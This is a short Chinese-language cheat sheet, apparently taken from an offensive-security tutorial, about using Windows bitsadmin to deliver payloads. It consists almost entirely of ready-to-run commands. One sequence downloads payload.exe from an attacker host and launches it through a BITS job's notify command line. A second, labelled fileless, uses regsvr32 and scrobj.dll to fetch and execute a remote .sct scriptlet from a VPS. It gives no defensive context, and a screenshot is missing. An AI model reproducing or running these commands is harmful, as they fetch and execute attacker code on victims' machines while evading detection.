使用方式

1.bitsadmin /create hackingarticles #hackingarticles:任务名字
2.bitsadmin /addfile hackingarticles http://192.168.1.13/payload.exe C:\payload.exe
3.bitsadmin /SetNotifyCmdLine hackingarticles cmd.exe “/c bitsadmin.exe /complete hackingarticles | start /B C:\payload.exe”
4.bitsadmin /resume hackingarticles

无文件落地下载方式

使用方式

vps上执行:
image.png
1.bitsadmin /create hackingarticles
2.bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png c:\ignite.png
3.bitsadmin / SetNotifyCmdLine hackingarticles regsvr32.exe “/s/n/u /i:http://192.168.1.13:8080/dE8vICrV.sct scrobj.dll”
4.bitsadmin /resume hackingarticles